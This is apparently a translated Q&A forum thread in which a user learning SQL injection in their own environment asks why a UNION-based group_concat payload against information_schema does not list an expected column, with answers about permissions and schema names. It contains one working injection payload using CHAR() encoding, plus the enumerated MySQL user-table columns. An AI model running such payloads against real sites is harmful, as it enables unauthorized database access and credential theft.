Sql注入group_concat

我正在研究一些SQLi的個人教育，我一直在遇到同樣的問題。Sql注入group_concat

當我使用下面的注入

bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #

我得到一個表的所有列名叫做用戶 - >

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin

而對於一個事實，因爲這是我自己控制的環境中，我知道該表包含一個名爲UserName的列。爲什麼不列出列結果？

來源

2012-10-25 Gert-Jan Bos

這應該工作。您可能會檢查執行查詢的帳戶是否有權訪問列UserName。 http://dev.mysql.com/doc/refman/5.0/en/information-schema.html 建議您只能看到有權訪問的列。

來源

2012-10-25 14:07:51 shellster

答案：有多個表稱爲用戶，我沒有指定在什麼table_scheme搜索

來源

2012-10-25 14:25:11

Sql注入group_concat

回答

相關問題